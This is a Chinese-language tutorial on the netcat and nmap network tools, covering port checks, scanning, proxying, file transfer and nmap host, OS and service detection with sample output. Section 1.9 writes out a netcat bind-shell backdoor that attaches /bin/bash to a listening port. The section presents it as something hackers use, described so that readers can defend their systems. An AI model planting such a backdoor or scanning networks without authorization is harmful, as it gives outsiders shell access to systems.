netcat/nmap: 網絡工具中里的“瑞士軍刀”


cnblog: nc工具使用

1. netcat

netcat, 別名 ncatnc ,擁有Windows和Linux的版本。因為它短小精悍,功能實用,被設計為一個簡單、可靠的網絡工具,可通過TCP或UDP協議傳輸讀寫數據。同時,它還是一個網絡應用Debug分析器,因為它可以根據需要創建各種不同類型的網絡連接。

1.1. 常用功能一覽

nc的常用的幾個參數如下所列:

  1. -l <port>

    用於指定nc將處於偵聽模式。指定該參數,則意味着nc被當作server,偵聽並接受連接,而非向其它地址發起連接。

  2. -p <port>

    暫未用到(老版本的nc可能需要在端口號前加-p參數,下面測試環境是centos6.6,nc版本是nc-1.84,未用到-p參數)

  3. -s

    指定發送數據的源IP地址,適用於多網卡機

  4. -u

    指定nc使用UDP協議,默認為TCP

  5. -n

    直接使用IP地址,而不通過 DNS 域名服務器(可以加快掃描速度)。

  6. -v

    顯示詳細信息,新手調試時尤為有用

  7. -w <seconds>

    超時秒數,后面跟數字

  8. -z

    表示zero,表示掃描時不發送任何數據。一般只在掃描通信端口時使用。

  9. -k

    當客戶端從服務端斷開連接后,過一段時間服務端也會停止監聽。但通過 -k 選項我們可以強制服務器保持連接並繼續監聽端口。

1.2. 驗證端口的開放

ncat -vz http://www.baidu.com 80

1.3. 端口掃描

ncat -vzn 192.168.0.191 1-25555

1.4. 連接遠程系統

ncat <ip_addr> <port>
# 例如: ncat 192.168.1.100 80

這會創建一個連接,連接到 IP 為 192.168.1.100 的服務器上的 80 端口,然后我們就可以向服務器發送指令了。 比如我們可以輸入 GET / HTTP/1.1 來獲取完整的網頁內容。

1.5. 作為聊天工具

nc 也可以作為聊天工具來用,我們可以配置服務器監聽某個端口,然后從遠程主機上連接到服務器的這個端口,就可以開始發送消息了。

在服務器這端運行:

$ ncat -l 8080

遠程客戶端主機上運行:

$ ncat 192.168.1.100 8080

之后開始發送消息,這些消息會在服務器終端上顯示出來。

1.6. 作為代理/轉發數據

$ ncat -l 8080 | ncat 192.168.1.200 80

所有發往我們服務器 8080 端口的連接都會自動轉發到 192.168.1.200 上的 80 端口。

不過由於我們使用了管道,數據只能被單向傳輸。要同時能夠接受返回的數據,我們需要創建一個雙向管道。 使用下面命令可以做到這點:

$ mkfifo 2way
$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way

1.7. 通過 nc 進行端口轉發

我們通過選項 -c 來用 nc 進行端口轉發,實現端口轉發的語法為:

$ ncat -u -l  80 -c  'ncat -u -l 8080'

這樣,所有連接到 80 端口的連接都會轉發到 8080 端口。

1.8. 傳輸文件

nc 還能用來在系統間拷貝文件(當然不如ssh/scp安全),不過足夠靈活。

在要接受數據的機器上啟動 nc 並讓它進入監聽模式:

$ ncat -l  8080 > file.txt

現在去要被拷貝數據的機器上運行下面命令:

$ ncat 192.168.1.100 8080 --send-only < data.txt

這里,data.txt 是要發送的文件。 -–send-only 選項會在文件拷貝完后立即關閉連接。

如果不加該選項,我們需要手工按下 ctrl+c 來關閉連接。

1.9. 通過 nc 創建后門

nc 命令還可以用來在系統中創建后門,並且這種技術也確實被黑客大量使用。 為了保護我們的系統,我們需要知道它是怎么做的。 創建后門的命令為:

$ ncat -l 10000 -e /bin/bash

-e 標志將一個 bash 與端口 10000 相連。現在客戶端只要連接到服務器上的 10000 端口就能通過 bash 獲取我們系統的完整訪問權限:

$ ncat 192.168.1.100 10000

2. nmap: 專用於IP掃描工具

wechat: NMAP網絡掃描工具

2.1. 僅掃描IP地址(使用ping)

通過ping檢測掃描目標網絡中的活動主機(主機發現)

nmap   -sP  192.168.10.0/24
# 輸出
Starting Nmap 6.40 ( http://nmap.org ) at 2020-12-22 16:46 CST
Nmap scan report for 192.168.0.1
Host is up (0.0013s latency).
Nmap scan report for 192.168.0.2
Host is up (0.0011s latency).
Nmap scan report for 192.168.0.3
Host is up (0.0041s latency).
Nmap scan report for 192.168.0.4
Host is up (0.019s latency).
Nmap scan report for 192.168.0.16
Host is up (0.00057s latency).
Nmap scan report for bbs.heroje.com (192.168.0.17)
Host is up (0.00050s latency).
...
Nmap done: 256 IP addresses (34 hosts up) scanned in 3.93 seconds

2.2. 掃描目標網段的常用TCP端口

nmap  -v  192.168.10.0/24
# 輸出
...
Nmap scan report for 192.168.10.0 [host down]
Nmap scan report for 192.168.10.3 [host down]
...
Initiating Parallel DNS resolution of 1 host. at 13:24
Completed Parallel DNS resolution of 1 host. at 13:24, 0.06s elapsed
Initiating SYN Stealth Scan at 13:24
Scanning 3 hosts [1000 ports/host]
Discovered open port 53/tcp on 192.168.10.2
Completed SYN Stealth Scan against 192.168.10.2 in 0.13s (2 hosts left)
Discovered open port 445/tcp on 192.168.10.1
Discovered open port 135/tcp on 192.168.10.1
Discovered open port 5357/tcp on 192.168.10.1
Completed SYN Stealth Scan against 192.168.10.254 in 6.09s (1 host left)
Completed SYN Stealth Scan at 13:24, 6.23s elapsed (3000 total ports)
Nmap scan report for 192.168.10.1
Host is up (0.00017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5357/tcp open  wsdapi
MAC Address: 00:50:56:C0:00:08 (VMware)
...

2.3. 檢查IP范圍192.168.10.2~192.168.10.4內,有哪些主機開放22端口

P0表示即使不能ping通也嘗試檢查

nmap   -P0   -p  22  192.168.10.2-4
# 輸出
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-14 14:00 CST
Nmap scan report for bogon (192.168.10.2)
Host is up (0.00015s latency).

PORT   STATE  SERVICE
22/tcp closed ssh

Nmap scan report for bogon (192.168.10.4)
Host is up (0.00038s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 3 IP addresses (3 hosts up) scanned in 0.26 seconds

2.4. 檢查目標主機的操作系統類型(OS指紋探測)

nmap  -O  192.168.10.2
# 輸出
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-14 14:03 CST
Nmap scan report for bogon (192.168.10.2)
Host is up (0.0071s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FC:3E:15 (VMware)
Aggressive OS guesses: VMware Player virtual NAT device (99%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (93%), Microsoft Windows XP SP3 (93%), DVTel DVT-9540DW network camera (91%), DD-WRT v24-sp2 (Linux 2.4.37) (90%), Actiontec MI424WR-GEN3I WAP (90%), Linux 3.2 (90%), Linux 4.4 (90%), BlueArc Titan 2100 NAS device (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.86 seconds

2.5. 檢查目標主機上某個端口對應的服務程序版本

nmap  -sV  -p  22  192.168.10.4
# 輸出
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-14 14:05 CST
Nmap scan report for bogon (192.168.10.4)
Host is up (0.000032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3p1 Debian 1 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

2.6. 指定掃描目標主機的哪些端口

nmap  -p 21,22,23,53,80 192.168.10.4
# 輸出
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-14 14:09 CST
Nmap scan report for bogon (192.168.10.4)
Host is up (0.000018s latency).

PORT   STATE  SERVICE
21/tcp closed ftp
22/tcp open   ssh
23/tcp closed telnet
53/tcp closed domain
80/tcp closed http

Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

2.7. 檢測目標主機是否開放DNS、DHCP服務

nmap -sU -p 53,67 192.168.10.2
# 輸出
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-15 13:37 CST
Nmap scan report for 192.168.10.2
Host is up (0.0023s latency).

PORT   STATE         SERVICE
53/udp open          domain
67/udp open|filtered dhcps
MAC Address: 00:50:56:F0:09:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds

2.8. 檢測目標主機是否啟用防火牆過濾

nmap -sA 192.168.10.4
# 輸出
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-15 13:34 CST
Nmap scan report for 192.168.10.4
Host is up (0.0000020s latency).
All 1000 scanned ports on 192.168.10.4 are unfiltered

Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM